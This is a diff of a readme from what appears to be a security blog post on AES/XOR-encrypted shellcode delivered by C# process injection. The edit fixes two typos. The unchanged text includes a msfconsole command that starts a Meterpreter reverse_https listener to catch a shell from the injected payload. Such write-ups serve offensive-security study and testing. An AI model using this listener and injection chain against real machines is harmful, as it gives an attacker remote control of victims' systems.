0x90JMP/0x90JMP.github.io/blog/pythonAesXor/readme.md

 ## Getting A Shell On The Target Machine

-To test that the InjectAes.exe functions correctly, we first set up a msfconsole listener on Kali linux, with the following command.
-The listener will wait for the incoming connection, from shell code that was executed on the target machine (The C# Process Injecton).
+To test that the InjectAes.exe functions correctly, we first set up a msfconsole listener on Kali Linux, with the following command.
+The listener will wait for the incoming connection, from shell code that was executed on the target machine (The C# Process Injection).

 ```
 sudo msfconsole -q -x "use exploit/multi/handler/; set PAYLOAD windows/x64/meterpreter/reverse_https; set LHOST eth0; set LPORT 443; run